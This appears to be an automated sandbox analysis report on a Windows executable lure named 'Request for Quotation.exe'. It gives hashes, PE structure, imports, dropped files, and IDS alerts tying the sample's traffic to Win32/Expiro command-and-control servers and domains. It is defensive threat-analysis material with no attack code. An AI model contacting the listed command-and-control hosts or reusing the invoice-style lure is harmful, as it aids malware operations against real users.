                                      Entropy (8bit):0.1000713122762396
                                      Encrypted:false
                                      SSDEEP:6:QcvjK3l/k/uMclF6vMclFq5zwoNOn+SkUeYDwDzymMjzj:nvjKV/kqF69Fq5z1O+pawHymMjv
                                      MD5:82958F99952586DA6A04221602A75B2A
                                      SHA1:BF105118A3718D207AA7711E668864C71EF243DE
                                      SHA-256:D38E1F42AC58B41026CCDC15353E63C2108A37F9D9138EE3CFB77723BA982905
                                      SHA-512:828E569CBBD7DD599F0376111876B2E9D1F160776F84C31155C61FD41471FF4E83D7FF71F1263C14463716F092AF04B60F5E597169F4E44019EDA5B141741DE2
                                      Malicious:false
                                      Preview:....`...`.......................................`...!...................................7].j....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............+1U..K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.........7].j....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

                                      Download File
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.10165695162133843
                                      Encrypted:false
                                      SSDEEP:6:DfdsK3l/k/uMclF6vMclFq5zwYzVNMu3n+SkUeYDwDzyMvdszb:DfaKV/kqF69Fq5z1TX+pawHyuan
                                      MD5:7E2F6C222EE046BCA85FB41AD9524377
                                      SHA1:6281034A9B41ACCD8613D0AD629668378A212550
                                      SHA-256:EAF642D39E11E3E7D90BF749CD5C75CFEDED46CC3B2BC40E85B594E4189F7E73
                                      SHA-512:C73823769F3851461961103B71A68E17D3CB848CD0ACC1A09E565F45223227102D7288600782C99F9B5B3EE03D0C2E5BE85BB38567EF066B03BB2C80EB1FB02A
                                      Malicious:false
                                      Preview:....h...h.......................................h...!...................................F..j....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............:.V..K..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.........F..j............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

                                      Download File
                                      Process:C:\Windows\System32\Spectrum.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.09913440271163
                                      Encrypted:false
                                      SSDEEP:6:ug7e/CK3Nk/uMclF6vMclFq5zweZNIn+SkUeYDwDzyb/Czr:u0e/CK9kqF69Fq5zfI+pawHyb/C3
                                      MD5:E658E8B8F111AE5D88E0855A5DFDAD09
                                      SHA1:FA900FBD486BB22C4F35F72BEE8D17E5A9A06AD1
                                      SHA-256:46FAA7181F760B02077815EB429D6D6A70D3EB3C1F15F61881161B3FE6917E7F
                                      SHA-512:53F3C0BE667B0A4D9CE79A592251ECD4E49015B3073DA305BF51CB11E25CC65A7F757830EF37FA1ED7122BDF7E750A71F8470FA7DAB547B6A1CAC43175CAF324
                                      Malicious:false
                                      Preview:....X...X.......................................X...!...................................>..j....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............2.U..K..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.........>..j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.5198307624537
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Request for Quotation.exe
                                      File size:1'795'584 bytes
                                      MD5:fe6fb05450b37478070255dcf0a11654
                                      SHA1:a6246b77f50e6abb2cde5bd9071c9e005974349b
                                      SHA256:34d8fc929f49899ffc738a5f19e97b9d1d2d6e63b26884af6ce803d9aed050bb
                                      SHA512:fa371c82aad27ef0f652a009c1d6137789058da6048fda2c2a23ddad7ddcdb3baecca71ee01b3ae3e281301b07bb6e2ab5fd77bde403424f5423964b30c00b37
                                      SSDEEP:49152:z20c++OCvkGs9FaTvHOSeXSCY2gFIDRRAubt5M:iB3vkJ987miUf
                                      TLSH:0C85E02273DDC361CB669173FF2AB7016E7B3C250630B95B2F940D79A960172262D7A3
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                      File Icon

                                      Icon Hash:aaf3e3e3938382a0

                                      Static PE Info

                                      General

                                      Entrypoint:0x427dcd
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6756ACC8 [Mon Dec 9 08:39:36 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                      Entrypoint Preview

                                      Instruction
                                      call 00007FDD047FC2DAh
                                      jmp 00007FDD047EF0A4h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push edi
                                      push esi
                                      mov esi, dword ptr [esp+10h]
                                      mov ecx, dword ptr [esp+14h]
                                      mov edi, dword ptr [esp+0Ch]
                                      mov eax, ecx
                                      mov edx, ecx
                                      add eax, esi
                                      cmp edi, esi
                                      jbe 00007FDD047EF22Ah
                                      cmp edi, eax
                                      jc 00007FDD047EF58Eh
                                      bt dword ptr [004C31FCh], 01h
                                      jnc 00007FDD047EF229h
                                      rep movsb
                                      jmp 00007FDD047EF53Ch
                                      cmp ecx, 00000080h
                                      jc 00007FDD047EF3F4h
                                      mov eax, edi
                                      xor eax, esi
                                      test eax, 0000000Fh
                                      jne 00007FDD047EF230h
                                      bt dword ptr [004BE324h], 01h
                                      jc 00007FDD047EF700h
                                      bt dword ptr [004C31FCh], 00000000h
                                      jnc 00007FDD047EF3CDh
                                      test edi, 00000003h
                                      jne 00007FDD047EF3DEh
                                      test esi, 00000003h
                                      jne 00007FDD047EF3BDh
                                      bt edi, 02h
                                      jnc 00007FDD047EF22Fh
                                      mov eax, dword ptr [esi]
                                      sub ecx, 04h
                                      lea esi, dword ptr [esi+04h]
                                      mov dword ptr [edi], eax
                                      lea edi, dword ptr [edi+04h]
                                      bt edi, 03h
                                      jnc 00007FDD047EF233h
                                      movq xmm1, qword ptr [esi]
                                      sub ecx, 08h
                                      lea esi, dword ptr [esi+08h]
                                      movq qword ptr [edi], xmm1
                                      lea edi, dword ptr [edi+08h]
                                      test esi, 00000007h
                                      je 00007FDD047EF285h
                                      bt esi, 03h
                                      jnc 00007FDD047EF2D8h

                                      Rich Headers

                                      Programming Language:
                                      • [ASM] VS2013 build 21005
                                      • [ C ] VS2013 build 21005
                                      • [C++] VS2013 build 21005
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ASM] VS2013 UPD4 build 31101
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 UPD4 build 31101

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5ffe8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x8dcc40x8de003090a3327bcf1f126c5c7f9e4891301cFalse0.5728679102422908data6.676131091367248IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xc70000x5ffe80x60000e9a644d79666f608cdb10674b04ab1e0False0.9319737752278646data7.901823421147237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1270000x960000x950003811808c359cc067cc6f855b0d8f11adFalse0.9757530673238255data7.938033508315599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                      RT_RCDATA0xcf7b80x572afdata1.0003248944793146
                                      RT_GROUP_ICON0x126a680x76dataEnglishGreat Britain0.6610169491525424
                                      RT_GROUP_ICON0x126ae00x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0x126af40x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0x126b080x14dataEnglishGreat Britain1.25
                                      RT_VERSION0x126b1c0xdcdataEnglishGreat Britain0.6181818181818182
                                      RT_MANIFEST0x126bf80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                      Imports

                                      DLLImport
                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                      PSAPI.DLLGetProcessMemoryInfo
                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                      UxTheme.dllIsThemeActive
                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-10T16:40:07.592457+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.449730TCP
                                      2024-12-10T16:40:07.592457+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.449730TCP
                                      2024-12-10T16:40:11.038990+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.449733TCP
                                      2024-12-10T16:40:11.038990+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.449733TCP
                                      2024-12-10T16:40:14.844579+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44973544.221.84.10580TCP
                                      2024-12-10T16:40:15.049057+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.4566821.1.1.153UDP
                                      2024-12-10T16:40:15.089548+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.449735TCP
                                      2024-12-10T16:40:15.089548+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.449735TCP
                                      2024-12-10T16:40:22.228667+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.4532011.1.1.153UDP
                                      2024-12-10T16:41:56.640663+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44983682.112.184.19780TCP
                                      2024-12-10T16:41:59.468543+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.449882TCP
                                      2024-12-10T16:41:59.468543+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.449882TCP
                                      2024-12-10T16:42:01.940809+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.449888TCP
                                      2024-12-10T16:42:01.940809+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.449888TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 10, 2024 16:40:05.855644941 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:05.982038021 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:05.982587099 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:05.983470917 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:05.983470917 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:06.103008032 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:06.103020906 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:06.885466099 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.006526947 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:07.007930040 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.069133043 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.069181919 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.198252916 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:07.198263884 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:07.328208923 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:07.328330040 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:07.329246998 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.473028898 CET4973080192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:07.592457056 CET804973054.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:08.358298063 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:08.358314991 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:08.358408928 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:08.359724998 CET4973180192.168.2.454.244.188.177
                                      Dec 10, 2024 16:40:08.481991053 CET804973154.244.188.177192.168.2.4
                                      Dec 10, 2024 16:40:08.649343014 CET4973280192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.742172956 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.770462036 CET804973218.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:08.770550966 CET4973280192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.779573917 CET4973280192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.779602051 CET4973280192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.863445997 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:08.863579988 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.864067078 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.864188910 CET4973380192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:08.899144888 CET804973218.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:08.899166107 CET804973218.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:08.991522074 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:08.991555929 CET804973318.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:10.777882099 CET804973218.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:10.778063059 CET804973218.141.10.107192.168.2.4
                                      Dec 10, 2024 16:40:10.778115034 CET4973280192.168.2.418.141.10.107
                                      Dec 10, 2024 16:40:10.817816019 CET4973280192.168.2.418.141.10.107
